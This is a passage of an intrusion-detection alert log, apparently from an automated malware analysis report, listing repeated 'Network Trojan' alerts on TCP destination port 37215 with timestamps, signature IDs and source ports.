          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631676
          SID:2835222
          Source Port:55562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.368516
          SID:2835222
          Source Port:58644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141691
          SID:2829579
          Source Port:45528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299345
          SID:2835222
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208446
          SID:2835222
          Source Port:48916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742327
          SID:2829579
          Source Port:60012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116962
          SID:2829579
          Source Port:58090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532068
          SID:2829579
          Source Port:34648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480342
          SID:2835222
          Source Port:56468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115532
          SID:2835222
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845835
          SID:2835222
          Source Port:59472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879390
          SID:2829579
          Source Port:33192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760138
          SID:2829579
          Source Port:33548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708867
          SID:2829579
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923504
          SID:2829579
          Source Port:55382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214629
          SID:2835222
          Source Port:60704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739450
          SID:2829579
          Source Port:54934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221589
          SID:2829579
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356849
          SID:2829579
          Source Port:55340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223168
          SID:2835222
          Source Port:56486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328649
          SID:2835222
          Source Port:55926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528802
          SID:2829579
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591969
          SID:2835222
          Source Port:45746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.911273
          SID:2829579
          Source Port:52724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543040
          SID:2829579
          Source Port:38546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.621282
          SID:2835222
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774812
          SID:2829579
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140201
          SID:2835222
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559806
          SID:2835222
          Source Port:59738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.711066
          SID:2829579
          Source Port:36012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958777
          SID:2829579
          Source Port:44448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131763
          SID:2829579
          Source Port:35084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710185
          SID:2829579
          Source Port:36460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530413
          SID:2829579
          Source Port:57798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838470
          SID:2829579
          Source Port:51536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665406
          SID:2835222
          Source Port:34830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989791
          SID:2835222
          Source Port:36116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543521
          SID:2835222
          Source Port:53586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299569
          SID:2835222
          Source Port:50262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780925
          SID:2835222
          Source Port:51252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993127
          SID:2835222
          Source Port:37632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662769
          SID:2829579
          Source Port:43554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550560
          SID:2829579
          Source Port:46766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496970
          SID:2835222
          Source Port:42136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328826
          SID:2835222
          Source Port:47446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766979
          SID:2829579
          Source Port:33308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555255
          SID:2835222
          Source Port:33252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755967
          SID:2835222
          Source Port:52880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987456
          SID:2829579
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089568
          SID:2829579
          Source Port:33440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727604
          SID:2835222
          Source Port:55354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914275
          SID:2835222
          Source Port:54312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892895
          SID:2829579
          Source Port:37836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439966
          SID:2829579
          Source Port:46560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.611791
          SID:2835222
          Source Port:56226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778603
          SID:2835222
          Source Port:50674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.952025
          SID:2829579
          Source Port:40404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991726
          SID:2829579
          Source Port:37276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.918942
          SID:2835222
          Source Port:41200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278295
          SID:2835222
          Source Port:38976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.126811
          SID:2835222
          Source Port:37234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591201
          SID:2835222
          Source Port:53470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482517
          SID:2835222
          Source Port:38002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996626
          SID:2835222
          Source Port:45326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000601
          SID:2829579
          Source Port:38800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542678
          SID:2829579
          Source Port:37534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979197
          SID:2835222
          Source Port:56976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655613
          SID:2829579
          Source Port:58502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840719
          SID:2829579
          Source Port:42604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178488
          SID:2829579
          Source Port:33370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217173
          SID:2835222
          Source Port:52124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848400
          SID:2829579
          Source Port:42450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178959
          SID:2829579
          Source Port:53936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301354
          SID:2829579
          Source Port:34908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332652
          SID:2829579
          Source Port:52834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659714
          SID:2835222
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842204
          SID:2829579
          Source Port:38986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630563
          SID:2835222
          Source Port:33024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.855867
          SID:2835222
          Source Port:43288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216378
          SID:2835222
          Source Port:59310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290588
          SID:2835222
          Source Port:35734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462094
          SID:2835222
          Source Port:59002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102292
          SID:2835222
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838679
          SID:2835222
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.634144
          SID:2835222
          Source Port:41530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764701
          SID:2829579
          Source Port:37598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249083
          SID:2829579
          Source Port:43276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486262
          SID:2829579
          Source Port:57406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876506
          SID:2829579
          Source Port:47414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598937
          SID:2829579
          Source Port:58988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436299
          SID:2835222
          Source Port:57580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.679990
          SID:2829579
          Source Port:40716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680192
          SID:2829579
          Source Port:48212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684396
          SID:2835222
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767062
          SID:2829579
          Source Port:35476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211294
          SID:2835222
          Source Port:35862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543070
          SID:2829579
          Source Port:49752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062829
          SID:2829579
          Source Port:34960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300927
          SID:2835222
          Source Port:55904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022234
          SID:2835222
          Source Port:45322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216406
          SID:2829579
          Source Port:57688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497262
          SID:2829579
          Source Port:57230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914440
          SID:2829579
          Source Port:40716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470680
          SID:2835222
          Source Port:53594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176490
          SID:2829579
          Source Port:51452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084741
          SID:2835222
          Source Port:43356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595119
          SID:2829579
          Source Port:54304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817705
          SID:2829579
          Source Port:58442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671968
          SID:2829579
          Source Port:32930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652797
          SID:2835222
          Source Port:45470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.596946
          SID:2829579
          Source Port:37636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.098061
          SID:2835222
          Source Port:57546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812900
          SID:2829579
          Source Port:59974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182203
          SID:2829579
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953412
          SID:2829579
          Source Port:41712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510378
          SID:2835222
          Source Port:44728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.918941
          SID:2829579
          Source Port:38712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324628
          SID:2829579
          Source Port:40976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399219
          SID:2829579
          Source Port:38872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591237
          SID:2829579
          Source Port:35788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476196
          SID:2829579
          Source Port:50834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487102
          SID:2835222
          Source Port:33056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475718
          SID:2835222
          Source Port:36798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710683
          SID:2835222
          Source Port:39664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206980
          SID:2829579
          Source Port:60108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930918
          SID:2829579
          Source Port:42268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202189
          SID:2829579
          Source Port:60104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168303
          SID:2835222
          Source Port:34822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190446
          SID:2835222
          Source Port:51226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922776
          SID:2829579
          Source Port:43616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113162
          SID:2829579
          Source Port:35562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283674
          SID:2835222
          Source Port:52472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297457
          SID:2835222
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771516
          SID:2829579
          Source Port:42176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287870
          SID:2829579
          Source Port:43010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662744
          SID:2829579
          Source Port:47754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922567
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594571
          SID:2829579
          Source Port:36852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555279
          SID:2829579
          Source Port:48204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474467
          SID:2829579
          Source Port:51332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943309
          SID:2835222
          Source Port:49140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326876
          SID:2829579
          Source Port:39210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084156
          SID:2835222
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145146
          SID:2829579
          Source Port:57584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599063
          SID:2829579
          Source Port:37196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764475
          SID:2829579
          Source Port:59628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270495
          SID:2829579
          Source Port:45404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755698
          SID:2835222
          Source Port:39584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712154
          SID:2835222
          Source Port:34636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.110558
          SID:2829579
          Source Port:45070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598928
          SID:2829579
          Source Port:43630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623211
          SID:2835222
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667429
          SID:2835222
          Source Port:54532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483576
          SID:2829579
          Source Port:46868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555340
          SID:2835222
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493110
          SID:2829579
          Source Port:58478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756349
          SID:2829579
          Source Port:49808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202980
          SID:2829579
          Source Port:48494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044773
          SID:2835222
          Source Port:49540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.316530
          SID:2829579
          Source Port:58436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266831
          SID:2835222
          Source Port:48102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923199
          SID:2829579
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135979
          SID:2835222
          Source Port:40392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.633384
          SID:2829579
          Source Port:48576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.617074
          SID:2835222
          Source Port:45142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849286
          SID:2835222
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196010
          SID:2835222
          Source Port:58172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737948
          SID:2829579
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861492
          SID:2829579
          Source Port:46690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695779
          SID:2829579
          Source Port:58326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.229311
          SID:2829579
          Source Port:45758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591963
          SID:2835222
          Source Port:52306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847784
          SID:2835222
          Source Port:48736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979324
          SID:2835222
          Source Port:36010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114517
          SID:2829579
          Source Port:59648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281492
          SID:2829579
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978347
          SID:2829579
          Source Port:51616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173203
          SID:2829579
          Source Port:59592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206425
          SID:2829579
          Source Port:41656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462626
          SID:2835222
          Source Port:33242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140211
          SID:2835222
          Source Port:58066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491468
          SID:2829579
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215645
          SID:2829579
          Source Port:55390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.771068
          SID:2835222
          Source Port:57896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285165
          SID:2835222
          Source Port:44540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039666
          SID:2835222
          Source Port:43098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176493
          SID:2835222
          Source Port:54908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810531
          SID:2835222
          Source Port:39304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992134
          SID:2835222
          Source Port:37840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989136
          SID:2835222
          Source Port:33130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680201
          SID:2835222
          Source Port:57948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.223460
          SID:2829579
          Source Port:36454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975432
          SID:2829579
          Source Port:33286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484874
          SID:2835222
          Source Port:42170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.340998
          SID:2829579
          Source Port:59126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269659
          SID:2829579
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.891164
          SID:2829579
          Source Port:55068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
